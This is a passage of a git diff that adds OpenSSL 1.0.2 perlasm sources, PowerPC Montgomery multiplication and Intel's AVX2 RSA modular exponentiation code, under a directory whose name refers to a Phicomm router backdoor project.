+	 stfd	$T2a,`$FRAME+32`($sp)
+	adde	$t0,$t0,$t7
+	 stfd	$T2b,`$FRAME+40`($sp)
+	addze	$carry,$carry
+	 stfd	$T3a,`$FRAME+48`($sp)
+	addze	$c1,$c1
+	 stfd	$T3b,`$FRAME+56`($sp)
+	 stw	$t2,-4($tp)		; tp[j]
+	 stw	$t0,-8($tp)
+___
+}
+$code.=<<___;
+	bdnz-	Linner
+
+	fctid	$dota,$dota
+	fctid	$dotb,$dotb
+___
+if ($SIZE_T==8 or $flavour =~ /osx/) {
+$code.=<<___;
+	ld	$t0,`$FRAME+0`($sp)
+	ld	$t1,`$FRAME+8`($sp)
+	ld	$t2,`$FRAME+16`($sp)
+	ld	$t3,`$FRAME+24`($sp)
+	ld	$t4,`$FRAME+32`($sp)
+	ld	$t5,`$FRAME+40`($sp)
+	ld	$t6,`$FRAME+48`($sp)
+	ld	$t7,`$FRAME+56`($sp)
+	stfd	$dota,`$FRAME+64`($sp)
+	stfd	$dotb,`$FRAME+72`($sp)
+
+	add	$t0,$t0,$carry		; can not overflow
+	srdi	$carry,$t0,16
+	add	$t1,$t1,$carry
+	srdi	$carry,$t1,16
+	insrdi	$t0,$t1,16,32
+	add	$t2,$t2,$carry
+	ld	$t1,8($tp)		; tp[j]
+	srdi	$carry,$t2,16
+	insrdi	$t0,$t2,16,16
+	add	$t3,$t3,$carry
+	ldu	$t2,16($tp)		; tp[j+1]
+	srdi	$carry,$t3,16
+	insrdi	$t0,$t3,16,0		; 0..63 bits
+	add	$t4,$t4,$carry
+	srdi	$carry,$t4,16
+	add	$t5,$t5,$carry
+	srdi	$carry,$t5,16
+	insrdi	$t4,$t5,16,32
+	add	$t6,$t6,$carry
+	srdi	$carry,$t6,16
+	insrdi	$t4,$t6,16,16
+	add	$t7,$t7,$carry
+	insrdi	$t4,$t7,16,0		; 64..127 bits
+	srdi	$carry,$t7,16		; upper 33 bits
+	ld	$t6,`$FRAME+64`($sp)
+	ld	$t7,`$FRAME+72`($sp)
+
+	addc	$t3,$t0,$t1
+___
+$code.=<<___ if ($SIZE_T==4);		# adjust XER[CA]
+	extrdi	$t0,$t0,32,0
+	extrdi	$t1,$t1,32,0
+	adde	$t0,$t0,$t1
+___
+$code.=<<___;
+	adde	$t5,$t4,$t2
+___
+$code.=<<___ if ($SIZE_T==4);		# adjust XER[CA]
+	extrdi	$t4,$t4,32,0
+	extrdi	$t2,$t2,32,0
+	adde	$t4,$t4,$t2
+___
+$code.=<<___;
+	addze	$carry,$carry
+
+	std	$t3,-16($tp)		; tp[j-1]
+	std	$t5,-8($tp)		; tp[j]
+
+	add	$carry,$carry,$ovf	; comsume upmost overflow
+	add	$t6,$t6,$carry		; can not overflow
+	srdi	$carry,$t6,16
+	add	$t7,$t7,$carry
+	insrdi	$t6,$t7,48,0
+	srdi	$ovf,$t7,48
+	std	$t6,0($tp)		; tp[num-1]
+___
+} else {
+$code.=<<___;
+	lwz	$t1,`$FRAME+0`($sp)
+	lwz	$t0,`$FRAME+4`($sp)
+	lwz	$t3,`$FRAME+8`($sp)
+	lwz	$t2,`$FRAME+12`($sp)
+	lwz	$t5,`$FRAME+16`($sp)
+	lwz	$t4,`$FRAME+20`($sp)
+	lwz	$t7,`$FRAME+24`($sp)
+	lwz	$t6,`$FRAME+28`($sp)
+	stfd	$dota,`$FRAME+64`($sp)
+	stfd	$dotb,`$FRAME+72`($sp)
+
+	addc	$t0,$t0,$carry
+	adde	$t1,$t1,$c1
+	srwi	$carry,$t0,16
+	insrwi	$carry,$t1,16,0
+	srwi	$c1,$t1,16
+	addc	$t2,$t2,$carry
+	adde	$t3,$t3,$c1
+	srwi	$carry,$t2,16
+	 insrwi	$t0,$t2,16,0		; 0..31 bits
+	 lwz	$t2,12($tp)		; tp[j]
+	insrwi	$carry,$t3,16,0
+	srwi	$c1,$t3,16
+	 lwz	$t3,8($tp)
+	addc	$t4,$t4,$carry
+	adde	$t5,$t5,$c1
+	srwi	$carry,$t4,16
+	insrwi	$carry,$t5,16,0
+	srwi	$c1,$t5,16
+	addc	$t6,$t6,$carry
+	adde	$t7,$t7,$c1
+	srwi	$carry,$t6,16
+	 insrwi	$t4,$t6,16,0		; 32..63 bits
+	insrwi	$carry,$t7,16,0
+	srwi	$c1,$t7,16
+
+	addc	$t0,$t0,$t2
+	adde	$t4,$t4,$t3
+	addze	$carry,$carry
+	addze	$c1,$c1
+	 stw	$t0,4($tp)		; tp[j-1]
+	 stw	$t4,0($tp)
+
+	lwz	$t3,`$FRAME+32`($sp)	; permuted $t1
+	lwz	$t2,`$FRAME+36`($sp)	; permuted $t0
+	lwz	$t7,`$FRAME+40`($sp)	; permuted $t3
+	lwz	$t6,`$FRAME+44`($sp)	; permuted $t2
+	lwz	$t1,`$FRAME+48`($sp)	; permuted $t5
+	lwz	$t0,`$FRAME+52`($sp)	; permuted $t4
+	lwz	$t5,`$FRAME+56`($sp)	; permuted $t7
+	lwz	$t4,`$FRAME+60`($sp)	; permuted $t6
+
+	addc	$t2,$t2,$carry
+	adde	$t3,$t3,$c1
+	srwi	$carry,$t2,16
+	insrwi	$carry,$t3,16,0
+	srwi	$c1,$t3,16
+	addc	$t6,$t6,$carry
+	adde	$t7,$t7,$c1
+	srwi	$carry,$t6,16
+	 insrwi	$t2,$t6,16,0		; 64..95 bits
+	 lwz	$t6,20($tp)
+	insrwi	$carry,$t7,16,0
+	srwi	$c1,$t7,16
+	 lwzu	$t7,16($tp)
+	addc	$t0,$t0,$carry
+	adde	$t1,$t1,$c1
+	srwi	$carry,$t0,16
+	insrwi	$carry,$t1,16,0
+	srwi	$c1,$t1,16
+	addc	$t4,$t4,$carry
+	adde	$t5,$t5,$c1
+	srwi	$carry,$t4,16
+	 insrwi	$t0,$t4,16,0		; 96..127 bits
+	insrwi	$carry,$t5,16,0
+	srwi	$c1,$t5,16
+
+	addc	$t2,$t2,$t6
+	adde	$t0,$t0,$t7
+	 lwz	$t7,`$FRAME+64`($sp)
+	 lwz	$t6,`$FRAME+68`($sp)
+	addze	$carry,$carry
+	addze	$c1,$c1
+	 lwz	$t5,`$FRAME+72`($sp)
+	 lwz	$t4,`$FRAME+76`($sp)
+
+	addc	$t6,$t6,$carry
+	adde	$t7,$t7,$c1
+	 stw	$t2,-4($tp)		; tp[j]
+	 stw	$t0,-8($tp)
+	addc	$t6,$t6,$ovf
+	addze	$t7,$t7
+	srwi	$carry,$t6,16
+	insrwi	$carry,$t7,16,0
+	srwi	$c1,$t7,16
+	addc	$t4,$t4,$carry
+	adde	$t5,$t5,$c1
+
+	insrwi	$t6,$t4,16,0
+	srwi	$t4,$t4,16
+	insrwi	$t4,$t5,16,0
+	srwi	$ovf,$t5,16
+	stw	$t6,4($tp)		; tp[num-1]
+	stw	$t4,0($tp)
+___
+}
+$code.=<<___;
+	slwi	$t7,$num,2
+	addi	$i,$i,8
+	subf	$nap_d,$t7,$nap_d	; rewind pointer
+	cmpw	$i,$num
+	blt-	Louter
+___
+
+$code.=<<___ if ($SIZE_T==8);
+	subf	$np,$num,$np	; rewind np
+	addi	$j,$j,1		; restore counter
+	subfc	$i,$i,$i	; j=0 and "clear" XER[CA]
+	addi	$tp,$sp,`$FRAME+$TRANSFER+8`
+	addi	$t4,$sp,`$FRAME+$TRANSFER+16`
+	addi	$t5,$np,8
+	addi	$t6,$rp,8
+	mtctr	$j
+
+.align	4
+Lsub:	ldx	$t0,$tp,$i
+	ldx	$t1,$np,$i
+	ldx	$t2,$t4,$i
+	ldx	$t3,$t5,$i
+	subfe	$t0,$t1,$t0	; tp[j]-np[j]
+	subfe	$t2,$t3,$t2	; tp[j+1]-np[j+1]
+	stdx	$t0,$rp,$i
+	stdx	$t2,$t6,$i
+	addi	$i,$i,16
+	bdnz-	Lsub
+
+	li	$i,0
+	subfe	$ovf,$i,$ovf	; handle upmost overflow bit
+	and	$ap,$tp,$ovf
+	andc	$np,$rp,$ovf
+	or	$ap,$ap,$np	; ap=borrow?tp:rp
+	addi	$t7,$ap,8
+	mtctr	$j
+
+.align	4
+Lcopy:				; copy or in-place refresh
+	ldx	$t0,$ap,$i
+	ldx	$t1,$t7,$i
+	std	$i,8($nap_d)	; zap nap_d
+	std	$i,16($nap_d)
+	std	$i,24($nap_d)
+	std	$i,32($nap_d)
+	std	$i,40($nap_d)
+	std	$i,48($nap_d)
+	std	$i,56($nap_d)
+	stdu	$i,64($nap_d)
+	stdx	$t0,$rp,$i
+	stdx	$t1,$t6,$i
+	stdx	$i,$tp,$i	; zap tp at once
+	stdx	$i,$t4,$i
+	addi	$i,$i,16
+	bdnz-	Lcopy
+___
+$code.=<<___ if ($SIZE_T==4);
+	subf	$np,$num,$np	; rewind np
+	addi	$j,$j,1		; restore counter
+	subfc	$i,$i,$i	; j=0 and "clear" XER[CA]
+	addi	$tp,$sp,`$FRAME+$TRANSFER`
+	addi	$np,$np,-4
+	addi	$rp,$rp,-4
+	addi	$ap,$sp,`$FRAME+$TRANSFER+4`
+	mtctr	$j
+
+.align	4
+Lsub:	lwz	$t0,12($tp)	; load tp[j..j+3] in 64-bit word order
+	lwz	$t1,8($tp)
+	lwz	$t2,20($tp)
+	lwzu	$t3,16($tp)
+	lwz	$t4,4($np)	; load np[j..j+3] in 32-bit word order
+	lwz	$t5,8($np)
+	lwz	$t6,12($np)
+	lwzu	$t7,16($np)
+	subfe	$t4,$t4,$t0	; tp[j]-np[j]
+	 stw	$t0,4($ap)	; save tp[j..j+3] in 32-bit word order
+	subfe	$t5,$t5,$t1	; tp[j+1]-np[j+1]
+	 stw	$t1,8($ap)
+	subfe	$t6,$t6,$t2	; tp[j+2]-np[j+2]
+	 stw	$t2,12($ap)
+	subfe	$t7,$t7,$t3	; tp[j+3]-np[j+3]
+	 stwu	$t3,16($ap)
+	stw	$t4,4($rp)
+	stw	$t5,8($rp)
+	stw	$t6,12($rp)
+	stwu	$t7,16($rp)
+	bdnz-	Lsub
+
+	li	$i,0
+	subfe	$ovf,$i,$ovf	; handle upmost overflow bit
+	addi	$tp,$sp,`$FRAME+$TRANSFER+4`
+	subf	$rp,$num,$rp	; rewind rp
+	and	$ap,$tp,$ovf
+	andc	$np,$rp,$ovf
+	or	$ap,$ap,$np	; ap=borrow?tp:rp
+	addi	$tp,$sp,`$FRAME+$TRANSFER`
+	mtctr	$j
+
+.align	4
+Lcopy:				; copy or in-place refresh
+	lwz	$t0,4($ap)
+	lwz	$t1,8($ap)
+	lwz	$t2,12($ap)
+	lwzu	$t3,16($ap)
+	std	$i,8($nap_d)	; zap nap_d
+	std	$i,16($nap_d)
+	std	$i,24($nap_d)
+	std	$i,32($nap_d)
+	std	$i,40($nap_d)
+	std	$i,48($nap_d)
+	std	$i,56($nap_d)
+	stdu	$i,64($nap_d)
+	stw	$t0,4($rp)
+	stw	$t1,8($rp)
+	stw	$t2,12($rp)
+	stwu	$t3,16($rp)
+	std	$i,8($tp)	; zap tp at once
+	stdu	$i,16($tp)
+	bdnz-	Lcopy
+___
+
+$code.=<<___;
+	$POP	$i,0($sp)
+	li	r3,1	; signal "handled"
+	$POP	r19,`-12*8-13*$SIZE_T`($i)
+	$POP	r20,`-12*8-12*$SIZE_T`($i)
+	$POP	r21,`-12*8-11*$SIZE_T`($i)
+	$POP	r22,`-12*8-10*$SIZE_T`($i)
+	$POP	r23,`-12*8-9*$SIZE_T`($i)
+	$POP	r24,`-12*8-8*$SIZE_T`($i)
+	$POP	r25,`-12*8-7*$SIZE_T`($i)
+	$POP	r26,`-12*8-6*$SIZE_T`($i)
+	$POP	r27,`-12*8-5*$SIZE_T`($i)
+	$POP	r28,`-12*8-4*$SIZE_T`($i)
+	$POP	r29,`-12*8-3*$SIZE_T`($i)
+	$POP	r30,`-12*8-2*$SIZE_T`($i)
+	$POP	r31,`-12*8-1*$SIZE_T`($i)
+	lfd	f20,`-12*8`($i)
+	lfd	f21,`-11*8`($i)
+	lfd	f22,`-10*8`($i)
+	lfd	f23,`-9*8`($i)
+	lfd	f24,`-8*8`($i)
+	lfd	f25,`-7*8`($i)
+	lfd	f26,`-6*8`($i)
+	lfd	f27,`-5*8`($i)
+	lfd	f28,`-4*8`($i)
+	lfd	f29,`-3*8`($i)
+	lfd	f30,`-2*8`($i)
+	lfd	f31,`-1*8`($i)
+	mr	$sp,$i
+	blr
+	.long	0
+	.byte	0,12,4,0,0x8c,13,6,0
+	.long	0
+.size	.$fname,.-.$fname
+
+.asciz  "Montgomery Multiplication for PPC64, CRYPTOGAMS by <appro\@openssl.org>"
+___
+
+$code =~ s/\`([^\`]*)\`/eval $1/gem;
+print $code;
+close STDOUT;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/rsaz-avx2.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/rsaz-avx2.pl
new file mode 100755
index 0000000..3b6ccf8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/asm/rsaz-avx2.pl
@@ -0,0 +1,1898 @@
+#!/usr/bin/env perl
+
+##############################################################################
+#                                                                            #
+#  Copyright (c) 2012, Intel Corporation                                     #
+#                                                                            #
+#  All rights reserved.                                                      #
+#                                                                            #
+#  Redistribution and use in source and binary forms, with or without        #
+#  modification, are permitted provided that the following conditions are    #
+#  met:                                                                      #
+#                                                                            #
+#  *  Redistributions of source code must retain the above copyright         #
+#     notice, this list of conditions and the following disclaimer.          #
+#                                                                            #
+#  *  Redistributions in binary form must reproduce the above copyright      #
+#     notice, this list of conditions and the following disclaimer in the    #
+#     documentation and/or other materials provided with the                 #
+#     distribution.                                                          #
+#                                                                            #
+#  *  Neither the name of the Intel Corporation nor the names of its         #
+#     contributors may be used to endorse or promote products derived from   #
+#     this software without specific prior written permission.               #
+#                                                                            #
+#                                                                            #
+#  THIS SOFTWARE IS PROVIDED BY INTEL CORPORATION ""AS IS"" AND ANY          #
+#  EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE         #
+#  IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR        #
+#  PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL INTEL CORPORATION OR            #
+#  CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,     #
+#  EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,       #
+#  PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR        #
+#  PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF    #
+#  LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING      #
+#  NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS        #
+#  SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.              #
+#                                                                            #
+##############################################################################
+# Developers and authors:                                                    #
+# Shay Gueron (1, 2), and Vlad Krasnov (1)                                   #
+# (1) Intel Corporation, Israel Development Center, Haifa, Israel            #
+# (2) University of Haifa, Israel                                            #
+##############################################################################
+# Reference:                                                                 #
+# [1] S. Gueron, V. Krasnov: "Software Implementation of Modular             #
+#     Exponentiation,  Using Advanced Vector Instructions Architectures",    #
+#     F. Ozbudak and F. Rodriguez-Henriquez (Eds.): WAIFI 2012, LNCS 7369,   #
+#     pp. 119?135, 2012. Springer-Verlag Berlin Heidelberg 2012              #
+# [2] S. Gueron: "Efficient Software Implementations of Modular              #
+#     Exponentiation", Journal of Cryptographic Engineering 2:31-43 (2012).  #
+# [3] S. Gueron, V. Krasnov: "Speeding up Big-numbers Squaring",IEEE         #
+#     Proceedings of 9th International Conference on Information Technology: #
+#     New Generations (ITNG 2012), pp.821-823 (2012)                         #
+# [4] S. Gueron, V. Krasnov: "[PATCH] Efficient and side channel analysis    #
+#     resistant 1024-bit modular exponentiation, for optimizing RSA2048      #
+#     on AVX2 capable x86_64 platforms",                                     #
+#     http://rt.openssl.org/Ticket/Display.html?id=2850&user=guest&pass=guest#
+##############################################################################
+#
+# +13% improvement over original submission by <appro@openssl.org>
+#
+# rsa2048 sign/sec	OpenSSL 1.0.1	scalar(*)	this
+# 2.3GHz Haswell	621		765/+23%	1113/+79%
+# 2.3GHz Broadwell(**)	688		1200(***)/+74%	1120/+63%
+#
+# (*)	if system doesn't support AVX2, for reference purposes;
+# (**)	scaled to 2.3GHz to simplify comparison;
+# (***)	scalar AD*X code is faster than AVX2 and is preferred code
+#	path for Broadwell;
+
+$flavour = shift;
+$output  = shift;
+if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
+
+$win64=0; $win64=1 if ($flavour =~ /[nm]asm|mingw64/ || $output =~ /\.asm$/);
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}x86_64-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/x86_64-xlate.pl" and -f $xlate) or
+die "can't locate x86_64-xlate.pl";
+
+if (`$ENV{CC} -Wa,-v -c -o /dev/null -x assembler /dev/null 2>&1`
+		=~ /GNU assembler version ([2-9]\.[0-9]+)/) {
+	$avx = ($1>=2.19) + ($1>=2.22);
+	$addx = ($1>=2.23);
+}
+
+if (!$avx && $win64 && ($flavour =~ /nasm/ || $ENV{ASM} =~ /nasm/) &&
+	    `nasm -v 2>&1` =~ /NASM version ([2-9]\.[0-9]+)/) {
+	$avx = ($1>=2.09) + ($1>=2.10);
+	$addx = ($1>=2.10);
+}
+
+if (!$avx && $win64 && ($flavour =~ /masm/ || $ENV{ASM} =~ /ml64/) &&
+	    `ml64 2>&1` =~ /Version ([0-9]+)\./) {
+	$avx = ($1>=10) + ($1>=11);
+	$addx = ($1>=11);
+}
+
+if (!$avx && `$ENV{CC} -v 2>&1` =~ /(^clang version|based on LLVM) ([3-9])\.([0-9]+)/) {
+	my $ver = $2 + $3/100.0;	# 3.1->3.01, 3.10->3.10
+	$avx = ($ver>=3.0) + ($ver>=3.01);
+	$addx = ($ver>=3.03);
+}
+
+open OUT,"| \"$^X\" $xlate $flavour $output";
+*STDOUT = *OUT;
+
+if ($avx>1) {{{
+{ # void AMS_WW(
+my $rp="%rdi";	# BN_ULONG *rp,
+my $ap="%rsi";	# const BN_ULONG *ap,
+my $np="%rdx";	# const BN_ULONG *np,
+my $n0="%ecx";	# const BN_ULONG n0,
+my $rep="%r8d";	# int repeat);
+
+# The registers that hold the accumulated redundant result
+# The AMM works on 1024 bit operands, and redundant word size is 29
+# Therefore: ceil(1024/29)/4 = 9
+my $ACC0="%ymm0";
+my $ACC1="%ymm1";
+my $ACC2="%ymm2";
+my $ACC3="%ymm3";
+my $ACC4="%ymm4";
+my $ACC5="%ymm5";
+my $ACC6="%ymm6";
+my $ACC7="%ymm7";
+my $ACC8="%ymm8";
+my $ACC9="%ymm9";
+# Registers that hold the broadcasted words of bp, currently used
+my $B1="%ymm10";
+my $B2="%ymm11";
+# Registers that hold the broadcasted words of Y, currently used
+my $Y1="%ymm12";
+my $Y2="%ymm13";
+# Helper registers
+my $TEMP1="%ymm14";
+my $AND_MASK="%ymm15";
+# alu registers that hold the first words of the ACC
+my $r0="%r9";
+my $r1="%r10";
+my $r2="%r11";
+my $r3="%r12";
+
+my $i="%r14d";			# loop counter
+my $tmp = "%r15";
+
+my $FrameSize=32*18+32*8;	# place for A^2 and 2*A
+
+my $aap=$r0;
+my $tp0="%rbx";
+my $tp1=$r3;
+my $tpa=$tmp;
+
+$np="%r13";			# reassigned argument
+
+$code.=<<___;
+.text
+
+.globl	rsaz_1024_sqr_avx2
+.type	rsaz_1024_sqr_avx2,\@function,5
+.align	64
+rsaz_1024_sqr_avx2:		# 702 cycles, 14% faster than rsaz_1024_mul_avx2
+	lea	(%rsp), %rax
+	push	%rbx
+	push	%rbp
+	push	%r12
+	push	%r13
+	push	%r14
+	push	%r15
+	vzeroupper
+___
+$code.=<<___ if ($win64);
+	lea	-0xa8(%rsp),%rsp
+	vmovaps	%xmm6,-0xd8(%rax)
+	vmovaps	%xmm7,-0xc8(%rax)
+	vmovaps	%xmm8,-0xb8(%rax)
+	vmovaps	%xmm9,-0xa8(%rax)
+	vmovaps	%xmm10,-0x98(%rax)
+	vmovaps	%xmm11,-0x88(%rax)
+	vmovaps	%xmm12,-0x78(%rax)
+	vmovaps	%xmm13,-0x68(%rax)
+	vmovaps	%xmm14,-0x58(%rax)
+	vmovaps	%xmm15,-0x48(%rax)
+.Lsqr_1024_body:
+___
+$code.=<<___;
+	mov	%rax,%rbp
+	mov	%rdx, $np			# reassigned argument
+	sub	\$$FrameSize, %rsp
+	mov	$np, $tmp
+	sub	\$-128, $rp			# size optimization
+	sub	\$-128, $ap
+	sub	\$-128, $np
+
+	and	\$4095, $tmp			# see if $np crosses page
+	add	\$32*10, $tmp
+	shr	\$12, $tmp
+	vpxor	$ACC9,$ACC9,$ACC9
+	jz	.Lsqr_1024_no_n_copy
+
+	# unaligned 256-bit load that crosses page boundary can
+	# cause >2x performance degradation here, so if $np does
+	# cross page boundary, copy it to stack and make sure stack
+	# frame doesn't...
+	sub		\$32*10,%rsp
+	vmovdqu		32*0-128($np), $ACC0
+	and		\$-2048, %rsp
+	vmovdqu		32*1-128($np), $ACC1
+	vmovdqu		32*2-128($np), $ACC2
+	vmovdqu		32*3-128($np), $ACC3
+	vmovdqu		32*4-128($np), $ACC4
+	vmovdqu		32*5-128($np), $ACC5
+	vmovdqu		32*6-128($np), $ACC6
+	vmovdqu		32*7-128($np), $ACC7
+	vmovdqu		32*8-128($np), $ACC8
+	lea		$FrameSize+128(%rsp),$np
+	vmovdqu		$ACC0, 32*0-128($np)
+	vmovdqu		$ACC1, 32*1-128($np)
+	vmovdqu		$ACC2, 32*2-128($np)
+	vmovdqu		$ACC3, 32*3-128($np)
+	vmovdqu		$ACC4, 32*4-128($np)
+	vmovdqu		$ACC5, 32*5-128($np)
+	vmovdqu		$ACC6, 32*6-128($np)
+	vmovdqu		$ACC7, 32*7-128($np)
+	vmovdqu		$ACC8, 32*8-128($np)
+	vmovdqu		$ACC9, 32*9-128($np)	# $ACC9 is zero
+
+.Lsqr_1024_no_n_copy:
+	and		\$-1024, %rsp
+
+	vmovdqu		32*1-128($ap), $ACC1
+	vmovdqu		32*2-128($ap), $ACC2
+	vmovdqu		32*3-128($ap), $ACC3
+	vmovdqu		32*4-128($ap), $ACC4
+	vmovdqu		32*5-128($ap), $ACC5
+	vmovdqu		32*6-128($ap), $ACC6
+	vmovdqu		32*7-128($ap), $ACC7
+	vmovdqu		32*8-128($ap), $ACC8
+
+	lea	192(%rsp), $tp0			# 64+128=192
+	vpbroadcastq	.Land_mask(%rip), $AND_MASK
+	jmp	.LOOP_GRANDE_SQR_1024
+
+.align	32
+.LOOP_GRANDE_SQR_1024:
+	lea	32*18+128(%rsp), $aap		# size optimization
+	lea	448(%rsp), $tp1			# 64+128+256=448
+
+	# the squaring is performed as described in Variant B of
+	# "Speeding up Big-Number Squaring", so start by calculating
+	# the A*2=A+A vector
+	vpaddq		$ACC1, $ACC1, $ACC1
+	 vpbroadcastq	32*0-128($ap), $B1
+	vpaddq		$ACC2, $ACC2, $ACC2
+	vmovdqa		$ACC1, 32*0-128($aap)
+	vpaddq		$ACC3, $ACC3, $ACC3
+	vmovdqa		$ACC2, 32*1-128($aap)
+	vpaddq		$ACC4, $ACC4, $ACC4
+	vmovdqa		$ACC3, 32*2-128($aap)
+	vpaddq		$ACC5, $ACC5, $ACC5
+	vmovdqa		$ACC4, 32*3-128($aap)
+	vpaddq		$ACC6, $ACC6, $ACC6
+	vmovdqa		$ACC5, 32*4-128($aap)
+	vpaddq		$ACC7, $ACC7, $ACC7
+	vmovdqa		$ACC6, 32*5-128($aap)
+	vpaddq		$ACC8, $ACC8, $ACC8
+	vmovdqa		$ACC7, 32*6-128($aap)
+	vpxor		$ACC9, $ACC9, $ACC9
+	vmovdqa		$ACC8, 32*7-128($aap)
+
+	vpmuludq	32*0-128($ap), $B1, $ACC0
+	 vpbroadcastq	32*1-128($ap), $B2
+	 vmovdqu	$ACC9, 32*9-192($tp0)	# zero upper half
+	vpmuludq	$B1, $ACC1, $ACC1
+	 vmovdqu	$ACC9, 32*10-448($tp1)
+	vpmuludq	$B1, $ACC2, $ACC2
+	 vmovdqu	$ACC9, 32*11-448($tp1)
+	vpmuludq	$B1, $ACC3, $ACC3
+	 vmovdqu	$ACC9, 32*12-448($tp1)
+	vpmuludq	$B1, $ACC4, $ACC4
+	 vmovdqu	$ACC9, 32*13-448($tp1)
+	vpmuludq	$B1, $ACC5, $ACC5
+	 vmovdqu	$ACC9, 32*14-448($tp1)
+	vpmuludq	$B1, $ACC6, $ACC6
+	 vmovdqu	$ACC9, 32*15-448($tp1)
+	vpmuludq	$B1, $ACC7, $ACC7
+	 vmovdqu	$ACC9, 32*16-448($tp1)
+	vpmuludq	$B1, $ACC8, $ACC8
+	 vpbroadcastq	32*2-128($ap), $B1
+	 vmovdqu	$ACC9, 32*17-448($tp1)
+
+	mov	$ap, $tpa
+	mov 	\$4, $i
+	jmp	.Lsqr_entry_1024
+___
+$TEMP0=$Y1;
+$TEMP2=$Y2;
+$code.=<<___;
+.align	32
+.LOOP_SQR_1024:
+	 vpbroadcastq	32*1-128($tpa), $B2
+	vpmuludq	32*0-128($ap), $B1, $ACC0
+	vpaddq		32*0-192($tp0), $ACC0, $ACC0
+	vpmuludq	32*0-128($aap), $B1, $ACC1
+	vpaddq		32*1-192($tp0), $ACC1, $ACC1
+	vpmuludq	32*1-128($aap), $B1, $ACC2
+	vpaddq		32*2-192($tp0), $ACC2, $ACC2
+	vpmuludq	32*2-128($aap), $B1, $ACC3
+	vpaddq		32*3-192($tp0), $ACC3, $ACC3
+	vpmuludq	32*3-128($aap), $B1, $ACC4
+	vpaddq		32*4-192($tp0), $ACC4, $ACC4
+	vpmuludq	32*4-128($aap), $B1, $ACC5
+	vpaddq		32*5-192($tp0), $ACC5, $ACC5
+	vpmuludq	32*5-128($aap), $B1, $ACC6
+	vpaddq		32*6-192($tp0), $ACC6, $ACC6
+	vpmuludq	32*6-128($aap), $B1, $ACC7
+	vpaddq		32*7-192($tp0), $ACC7, $ACC7
+	vpmuludq	32*7-128($aap), $B1, $ACC8
+	 vpbroadcastq	32*2-128($tpa), $B1
+	vpaddq		32*8-192($tp0), $ACC8, $ACC8
+.Lsqr_entry_1024:
+	vmovdqu		$ACC0, 32*0-192($tp0)
+	vmovdqu		$ACC1, 32*1-192($tp0)
+
+	vpmuludq	32*1-128($ap), $B2, $TEMP0
+	vpaddq		$TEMP0, $ACC2, $ACC2
+	vpmuludq	32*1-128($aap), $B2, $TEMP1
+	vpaddq		$TEMP1, $ACC3, $ACC3
+	vpmuludq	32*2-128($aap), $B2, $TEMP2
+	vpaddq		$TEMP2, $ACC4, $ACC4
+	vpmuludq	32*3-128($aap), $B2, $TEMP0
+	vpaddq		$TEMP0, $ACC5, $ACC5
+	vpmuludq	32*4-128($aap), $B2, $TEMP1
+	vpaddq		$TEMP1, $ACC6, $ACC6
+	vpmuludq	32*5-128($aap), $B2, $TEMP2
+	vpaddq		$TEMP2, $ACC7, $ACC7
+	vpmuludq	32*6-128($aap), $B2, $TEMP0
+	vpaddq		$TEMP0, $ACC8, $ACC8
+	vpmuludq	32*7-128($aap), $B2, $ACC0
+	 vpbroadcastq	32*3-128($tpa), $B2
+	vpaddq		32*9-192($tp0), $ACC0, $ACC0
+
+	vmovdqu		$ACC2, 32*2-192($tp0)
+	vmovdqu		$ACC3, 32*3-192($tp0)
+
+	vpmuludq	32*2-128($ap), $B1, $TEMP2
+	vpaddq		$TEMP2, $ACC4, $ACC4
+	vpmuludq	32*2-128($aap), $B1, $TEMP0
+	vpaddq		$TEMP0, $ACC5, $ACC5
+	vpmuludq	32*3-128($aap), $B1, $TEMP1
+	vpaddq		$TEMP1, $ACC6, $ACC6
+	vpmuludq	32*4-128($aap), $B1, $TEMP2
+	vpaddq		$TEMP2, $ACC7, $ACC7
+	vpmuludq	32*5-128($aap), $B1, $TEMP0
+	vpaddq		$TEMP0, $ACC8, $ACC8
+	vpmuludq	32*6-128($aap), $B1, $TEMP1
+	vpaddq		$TEMP1, $ACC0, $ACC0
+	vpmuludq	32*7-128($aap), $B1, $ACC1
+	 vpbroadcastq	32*4-128($tpa), $B1
+	vpaddq		32*10-448($tp1), $ACC1, $ACC1
+
+	vmovdqu		$ACC4, 32*4-192($tp0)
+	vmovdqu		$ACC5, 32*5-192($tp0)
+
+	vpmuludq	32*3-128($ap), $B2, $TEMP0
+	vpaddq		$TEMP0, $ACC6, $ACC6
+	vpmuludq	32*3-128($aap), $B2, $TEMP1
+	vpaddq		$TEMP1, $ACC7, $ACC7
+	vpmuludq	32*4-128($aap), $B2, $TEMP2
+	vpaddq		$TEMP2, $ACC8, $ACC8
+	vpmuludq	32*5-128($aap), $B2, $TEMP0
+	vpaddq		$TEMP0, $ACC0, $ACC0
+	vpmuludq	32*6-128($aap), $B2, $TEMP1
+	vpaddq		$TEMP1, $ACC1, $ACC1
+	vpmuludq	32*7-128($aap), $B2, $ACC2
+	 vpbroadcastq	32*5-128($tpa), $B2
+	vpaddq		32*11-448($tp1), $ACC2, $ACC2	
+
+	vmovdqu		$ACC6, 32*6-192($tp0)
+	vmovdqu		$ACC7, 32*7-192($tp0)
+
+	vpmuludq	32*4-128($ap), $B1, $TEMP0
+	vpaddq		$TEMP0, $ACC8, $ACC8
+	vpmuludq	32*4-128($aap), $B1, $TEMP1
